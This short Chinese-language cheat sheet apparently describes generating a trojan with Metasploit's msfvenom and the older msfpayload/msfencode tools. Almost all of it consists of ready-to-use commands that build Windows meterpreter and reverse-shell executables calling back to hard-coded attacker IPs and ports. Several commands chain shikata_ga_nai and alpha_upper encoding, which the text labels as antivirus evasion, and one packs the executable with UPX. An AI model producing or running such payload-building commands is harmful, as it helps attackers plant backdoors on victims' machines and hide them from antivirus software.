利用msfvenom生成木马程序
msfvenom -h
生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
msfvenom -p windows/meterpreter/reverse_tcp -o
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加壳:upx -5 /root/Desktop/acn.exe